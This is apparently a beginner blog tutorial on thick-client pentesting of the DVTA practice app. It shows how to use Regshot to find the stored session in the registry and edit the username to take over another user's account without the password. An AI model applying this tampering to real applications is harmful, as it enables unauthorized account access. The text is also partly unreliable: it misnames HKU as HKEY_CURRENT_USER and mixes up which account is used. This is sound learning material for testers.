Learning Thick Client VAPT with me. Part 6. Account Takeover.

Hey all.

Today we will learn about regshot. Basically to compare the difference between registry changes in our machine before and after the login into our thick client application. We can download the regshot from here: https://github.com/Seabreg/Regshot

Before that lets login into our thick application as rebecca and add some expenses. Then logout from our thick client application.

Let’s open the regshot without login into our thick client application and hit the 1st shot.

Now, lets login into our thick client application and hit the 2nd shot on regshot.

Now, let’s click on compare in the regshot, and it will give us the HTML result like this below image.

Let's find the string DVTA and see if anything is there. It has to be because in registry it will be there.

Let’s open to registry editor and open the HKU. But where is HKU?

By a simple google search we can know that HKU is HKEY_CURRENT_USER

We can see the logged-in user data is present in registry which is normal.

Now, let's do one thing. Let’s change the username to another user rebecca which is also a genuine user. Also change the email to rebecca@test.com. We will not change the password in the registry.

Now let’s just close our application (not the logout) and again open the application. We are in rebecca’s account. Note: rebecca user’s password is not rahul.

Let’s fetch the expenses from view expenses. If we can see rebecca’s expense on clothes then it is a vulnerability.

We can see the rebecca’s expense and not the user rahul’s expense. We are in the account of rebecca where we did not know about rebecca user’s password.

So, we learned that how to account takeover by using regshot and manipulate the registry. Let’s meet on next part.